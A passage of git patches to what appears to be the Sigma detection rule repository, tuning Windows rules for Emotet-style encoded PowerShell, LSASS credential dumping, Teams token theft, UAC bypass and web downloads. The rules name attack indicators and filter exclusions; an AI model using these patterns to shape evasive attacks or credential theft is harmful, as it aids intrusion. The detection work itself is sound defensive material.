iphlpapi.dll author: Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex) date: 2022/08/14 -modified: 2022/09/11 +modified: 2022/09/27 tags: - attack.defense_evasion - attack.persistence @@ -419,8 +419,10 @@ detection: filter_systemp: ImageLoaded|startswith: 'C:\Windows\SystemTemp\' filter_appvpolicy: - ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll - Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe + ImageLoaded: 'C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll' + Image: 'C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe' + filter_azure: + ImageLoaded|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' condition: selection and not 1 of filter_* falsepositives: - Legitimate applications loading their own versions of the DLLs mentioned in this rule diff --git a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml index c0ba595f8..64e40c05f 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml @@ -4,7 +4,7 @@ status: stable description: Detects all Emotet like process executions that are not covered by the more generic rules author: Florian Roth date: 2019/09/30 -modified: 2021/11/29 +modified: 2022/09/27 tags: - attack.execution - attack.t1059.001 @@ -32,7 +32,12 @@ detection: - 'PQAkAGUAbgB2ADoAdABlAG0AcAArACgA' # =$env:temp+( - '0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA' # =$env:temp+( - '9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA' # =$env:temp+( - condition: selection + filter: + CommandLine|contains: + - 'fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ' + - 'wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA' + - '8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA' + condition: selection and not filter fields: - CommandLine - ParentCommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml index 55a1e537c..a25e7f125 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml @@ -7,7 +7,7 @@ references: - https://tools.thehacker.recipes/mimikatz/modules author: Florian Roth (rule), David ANDRE (additional keywords) date: 2021/12/20 -modified: 2022/04/27 +modified: 2022/09/27 logsource: category: process_creation product: windows @@ -71,6 +71,8 @@ detection: filter_vs: Image|endswith: '\PING.EXE' ParentCommandLine|contains: '\DismFoDInstall.cmd' + filter_config_mgr: + ParentImage|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' condition: all of selection* and not 1 of filter* falsepositives: - Administrative activity From df60f30cc1ab92a4fed4de3e7ee733287c8499ce Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 00:21:09 +0200 Subject: [PATCH 101/120] Update file_event_win_cred_dump_tools_dropped_files.yml --- .../file_event/file_event_win_cred_dump_tools_dropped_files.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml index 04670a604..4f1bf73ac 100755 --- a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml +++ b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml @@ -6,7 +6,7 @@ author: Teymur Kheirkhabarov, oscd.community references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment date: 2019/11/01 -modified: 2022/01/11 +modified: 2022/09/21 logsource: category: file_event product: windows From 224ea52dcde52e9d8bdf3e0627b2a2a8b97a3736 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 00:21:33 +0200 Subject: [PATCH 102/120] Update proc_creation_win_cmstp_com_object_access.yml --- .../proc_creation_win_cmstp_com_object_access.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml index 49f39268f..7f43b42ec 100644 --- a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml +++ b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml @@ -12,7 +12,7 @@ tags: - car.2019-04-001 author: Nik Seetharaman, Christian Burkard date: 2019/07/31 -modified: 2021/08/31 +modified: 2022/09/21 references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ - https://twitter.com/hFireF0X/status/897640081053364225 From f9322f342c475c0743b902e8ceb521dbc3b89137 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 00:22:10 +0200 Subject: [PATCH 103/120] Update proc_creation_win_susp_sharpview.yml --- .../process_creation/proc_creation_win_susp_sharpview.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml index 031873c26..2618a0472 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml @@ -8,6 +8,7 @@ references: - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview date: 2021/12/10 +modified: 2022/09/27 logsource: category: process_creation product: windows From 9b091811dda09b0674b2251007b5c1e84dbe8fa9 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 00:22:34 +0200 Subject: [PATCH 104/120] Update proc_creation_win_uac_bypass_icmluautil.yml --- .../process_creation/proc_creation_win_uac_bypass_icmluautil.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml index 81ef7abf7..0c5df3289 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml @@ -3,6 +3,7 @@ id: 49f2f17b-b4c8-4172-a68b-d5bf95d05130 description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface author: Florian Roth date: 2022/09/13 +modified: 2022/09/27 status: experimental references: - https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html From 048de3fc81cf6f6457ac46e0a189b89231440dc8 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Tue, 27 Sep 2022 10:43:38 +0900 Subject: [PATCH 105/120] add diagnosis-scripted to windows services file --- tools/config/generic/windows-services.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml index 01b6d3de5..9861f29c6 100644 --- a/tools/config/generic/windows-services.yml +++ b/tools/config/generic/windows-services.yml @@ -166,3 +166,8 @@ logsources: service: bits-client conditions: Channel: 'Microsoft-Windows-Bits-Client/Operational' + windows-diagnosis-scripted: + product: windows + service: diagnosis-scripted + conditions: + Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' \ No newline at end of file From dd1fed29a05ae7bcafdf63dfcea0ba11fedc9cbf Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 27 Sep 2022 06:36:01 +0200 Subject: [PATCH 106/120] Add shell-core service --- tools/config/generic/windows-services.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml index 9861f29c6..0ca38a90f 100644 --- a/tools/config/generic/windows-services.yml +++ b/tools/config/generic/windows-services.yml @@ -170,4 +170,9 @@ logsources: product: windows service: diagnosis-scripted conditions: - Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' \ No newline at end of file + Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' + windows-shell-core: + product: windows + service: shell-core + conditions: + Channel: 'Microsoft-Windows-Shell-Core/Operational' From b53f08b081e0a50099be9b9e8eced82097fdbaf2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 09:12:06 +0200 Subject: [PATCH 107/120] Update proc_creation_win_process_dump_rundll32_comsvcs.yml --- .../proc_creation_win_process_dump_rundll32_comsvcs.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml index f8a26ecc7..e2f69aae4 100644 --- a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml +++ b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml @@ -14,7 +14,7 @@ references: - https://twitter.com/Wietze/status/1542107456507203586 author: Florian Roth, Modexp, Nasreddine Bencherchali (update) date: 2020/02/18 -modified: 2022/08/04 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.credential_access From 408bf9718153461f1583773f713ff0bc7bfab0e2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 09:12:44 +0200 Subject: [PATCH 108/120] Update proc_creation_win_susp_renamed_createdump.yml --- .../proc_creation_win_susp_renamed_createdump.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml index 160414c51..32145a719 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml @@ -21,7 +21,7 @@ detection: CommandLine|contains|all: - ' -u ' # Short version of '--full' - ' -f ' # Short version of '--name' - - '.dmp ' + - '.dmp' filter: Image|endswith: '\createdump.exe' condition: 1 of selection* and not filter From 600494adbc74f8ed6b2914f075b8c2e2e2e8ecc4 Mon Sep 17 00:00:00 2001 From: Qasim Qlf Date: Tue, 27 Sep 2022 13:11:08 +0500 Subject: [PATCH 109/120] Fix the filter --- ..._creation_win_teams_suspicious_command_line_cred_access.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml index 3c0eb326c..7d72377f8 100644 --- a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml +++ b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml @@ -7,6 +7,7 @@ references: - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens date: 2022/09/16 +modified: 2022/09/27 logsource: product: windows category: process_creation @@ -16,7 +17,7 @@ detection: - '\Microsoft\Teams\Cookies' - '\Microsoft\Teams\Local Storage\leveldb' filter: - Image|contains: '\Microsoft\Teams\current\Teams.exe' + Image|endswith: '\Microsoft\Teams\current\Teams.exe' condition: selection and not filter falsepositives: - Unknown From de517ba8a217d0eae0efdfc0b229124b7f0291d8 Mon Sep 17 00:00:00 2001 From: Qasim Qlf Date: Tue, 27 Sep 2022 13:21:48 +0500 Subject: [PATCH 110/120] Update proc_creation_win_uac_bypass_icmluautil.yml --- .../proc_creation_win_uac_bypass_icmluautil.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml index db964e3ad..69665e04b 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml @@ -3,6 +3,7 @@ id: 49f2f17b-b4c8-4172-a68b-d5bf95d05130 description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface author: Florian Roth date: 2022/09/13 +modified: 2022/09/27 status: experimental references: - https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html @@ -15,7 +16,7 @@ logsource: product: windows detection: selection: - Image|endswith: '\dllhost.exe' + ParentImage|endswith: '\dllhost.exe' ParentCommandLine: - '/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - '/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' From e46d19e450cc1f5df3faea914a7a0e5c5f67dc1e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 10:30:34 +0200 Subject: [PATCH 111/120] fix: condition --- .../powershell/powershell_script/posh_ps_web_request.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml index 6ead22b8a..3b73fd598 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml @@ -29,7 +29,7 @@ detection: - 'Start-BitsTransfer' filter: Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' - condition: selection + condition: selection and not filter falsepositives: - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. level: medium From 5e6a926ac381c72a90d27f4c14e3e7a8ce5116c8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 10:47:19 +0200 Subject: [PATCH 112/120] fix: FPs --- .../builtin/security/win_susp_lsass_dump_generic.yml | 7 +++++-- .../proc_creation_win_susp_gup_execution.yml | 3 ++- 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index 0942e28b4..cc71a77b0 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml @@ -4,7 +4,7 @@ description: Detects process handle on LSASS process with certain access mask status: experimental author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) date: 2019/11/01 -modified: 2022/09/18 +modified: 2022/09/27 references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment @@ -64,6 +64,7 @@ detection: - C:\Windows\SysWow64\ - C:\Windows\SysNative\ - C:\Program Files\ + - C:\Program Files (x86)\ - C:\Windows\Temp\asgard2-agent\ - C:\ProgramData\Microsoft\Windows Defender\Platform\ filter2: @@ -72,7 +73,9 @@ detection: ProcessName: 'C:\Windows\CCM\CcmExec.exe' filter4: ProcessName: 'C:\Windows\System32\taskhostw.exe' - AccessMask: '0x10' + AccessMask: + - '0x10' + - '0x1410' condition: 1 of selection_* and not 1 of filter* fields: - ComputerName diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml index a0305eede..bb8826b1e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml @@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://twitter.com/nas_bench/status/1535322445439180803 date: 2022/06/10 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -19,6 +20,6 @@ detection: condition: selection and not filter falsepositives: - Other parent binaries using GUP not currently identified -level: high +level: medium tags: - attack.execution From be265d06ed12be2c12a26ddcf344ea74055fad9f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 11:51:48 +0200 Subject: [PATCH 113/120] fix: casing of field --- rules/windows/file_event/file_event_win_ripzip_attack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_win_ripzip_attack.yml b/rules/windows/file_event/file_event_win_ripzip_attack.yml index 7f71a7886..78039d23b 100644 --- a/rules/windows/file_event/file_event_win_ripzip_attack.yml +++ b/rules/windows/file_event/file_event_win_ripzip_attack.yml @@ -15,7 +15,7 @@ logsource: product: windows detection: selection: # %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\target.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}\target.lnk - TargetFileName|contains|all: + TargetFilename|contains|all: - '\Microsoft\Windows\Start Menu\Programs\Startup' - '.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}' Image|endswith: '\explorer.exe' From e90c91668d54f8c72eb9d840716c14d11132bdc9 Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Tue, 27 Sep 2022 13:45:53 -0400 Subject: [PATCH 114/120] Update proc_creation_win_susp_psexesvc_as_system.yml Typo Fixed --- .../proc_creation_win_susp_psexesvc_as_system.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml index a61e012a5..14a3ff9bf 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml @@ -7,7 +7,7 @@ status: experimental description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec -author: FLorian Roth +author: Florian Roth date: 2022/07/21 tags: - attack.execution From 979502921feff32e1fe81fbab0087abdf6fb0a4c Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Wed, 28 Sep 2022 06:23:50 +0900 Subject: [PATCH 115/120] define security-mitigations service --- .../win_security_mitigations_defender_load_unsigned_dll.yml | 2 +- ..._security_mitigations_unsigned_dll_from_susp_location.yml | 2 +- tools/config/generic/windows-services.yml | 5 +++++ 3 files changed, 7 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml index e1cdc5070..12ae57714 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml @@ -12,7 +12,7 @@ tags: - attack.t1574.002 logsource: product: windows - category: security-mitigations + service: security-mitigations detection: selection: EventID: diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml index 6c202bf1c..f5e425899 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml @@ -12,7 +12,7 @@ tags: - attack.t1574.002 logsource: product: windows - category: security-mitigations + service: security-mitigations detection: selection: EventID: diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml index 0ca38a90f..11bc25aa4 100644 --- a/tools/config/generic/windows-services.yml +++ b/tools/config/generic/windows-services.yml @@ -176,3 +176,8 @@ logsources: service: shell-core conditions: Channel: 'Microsoft-Windows-Shell-Core/Operational' + security-mitigations: + product: windows + service: security-mitigations + conditions: + Provider_Name: 'Microsoft-Windows-Security-Mitigations' \ No newline at end of file From e44e01e106bc673848269ae061842e465d6fba86 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Wed, 28 Sep 2022 06:32:34 +0900 Subject: [PATCH 116/120] update modified tag --- .../win_security_mitigations_defender_load_unsigned_dll.yml | 2 +- ...win_security_mitigations_unsigned_dll_from_susp_location.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml index 12ae57714..aa7d64829 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml @@ -6,7 +6,7 @@ references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj date: 2022/08/02 -modified: 2022/08/05 +modified: 2022/09/28 tags: - attack.defense_evasion - attack.t1574.002 diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml index f5e425899..5e2c4ddce 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml @@ -6,7 +6,7 @@ references: - https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv author: Nasreddine Bencherchali date: 2022/08/03 -modified: 2022/08/05 +modified: 2022/09/28 tags: - attack.defense_evasion - attack.t1574.002 From 58b7c910dc423ce3a8f0b6f4d8fedd237e957364 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 23:50:35 +0200 Subject: [PATCH 117/120] Update proc_creation_win_w32tm.yml --- rules/windows/process_creation/proc_creation_win_w32tm.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_w32tm.yml b/rules/windows/process_creation/proc_creation_win_w32tm.yml index 82bcbcc13..55c1d2255 100644 --- a/rules/windows/process_creation/proc_creation_win_w32tm.yml +++ b/rules/windows/process_creation/proc_creation_win_w32tm.yml @@ -1,7 +1,7 @@ title: Use of W32tm as Timer id: 6da2c9f5-7c53-401b-aacb-92c040ce1215 status: experimental -description: When configured with suitable command line arguments,w32tm can act as a delay mechanism +description: When configured with suitable command line arguments, w32tm can act as a delay mechanism references: - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains From e583d9fc39b6597bddec70c36d9bbc6c2ff66e70 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 27 Sep 2022 23:52:22 +0200 Subject: [PATCH 118/120] Update proc_creation_win_w32tm.yml --- rules/windows/process_creation/proc_creation_win_w32tm.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_w32tm.yml b/rules/windows/process_creation/proc_creation_win_w32tm.yml index 55c1d2255..f3881508c 100644 --- a/rules/windows/process_creation/proc_creation_win_w32tm.yml +++ b/rules/windows/process_creation/proc_creation_win_w32tm.yml @@ -24,7 +24,7 @@ detection: condition: all of selection_* falsepositives: - Legitimate use -level: medium +level: high # because unlikely legitimate use of that flag combination tags: - attack.discovery - attack.t1124 From a9dd6f7ff09849e134cb430b42aa05a23b0501fe Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 28 Sep 2022 09:53:46 +0200 Subject: [PATCH 119/120] Add registry_set_change_winevt_channelaccess (#3505) --- ...gistry_set_change_winevt_channelaccess.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml diff --git a/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml b/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml new file mode 100644 index 000000000..234213d68 --- /dev/null +++ b/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml @@ -0,0 +1,30 @@ +title: Change Winevt Event Access Permission Via Registry +id: 7d9263bd-dc47-4a58-bc92-5474abab390c +description: Detects tampering with the "ChannelAccess" registry key in order to change access to windows event channel +author: frack113 +date: 2022/09/17 +status: experimental +references: + - https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/ + - https://learn.microsoft.com/en-us/windows/win32/api/winevt/ + - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ +logsource: + category: registry_set + product: windows +detection: + selection: + EventType: SetValue + TargetObject|startswith: 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\' + TargetObject|endswith: '\ChannelAccess' + # Add more interesting combinations if you found them + Details|contains: + - '(A;;0x1;;;SY)' # Local System having GENERIC ALL + - '(A;;0x5;;;BA)' # Built-in administrators having GENERIC ALL and GENERIC WRITE + - '(A;;0x1;;;LA)' # Local administrator having GENERIC ALL + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.t1562.002 From a563422c82ba1ad61cca1f1e225d3d88be1d9c1e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 28 Sep 2022 17:08:23 +0200 Subject: [PATCH 120/120] fix: filter definition in userinit rule --- .../proc_creation_win_susp_userinit_child.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml index b286838b9..589daabf4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/SBousseaden/status/1139811587760562176 author: Florian Roth (rule), Samir Bousseaden (idea) date: 2019/06/17 -modified: 2021/06/29 +modified: 2021/09/28 logsource: category: process_creation product: windows @@ -18,7 +18,7 @@ detection: filter2: - Image|endswith: '\explorer.exe' - ImageFileName: 'explorer.exe' - condition: selection and not filter1 and not filter2 + condition: selection and not 1 of filter* fields: - CommandLine - ParentCommandLine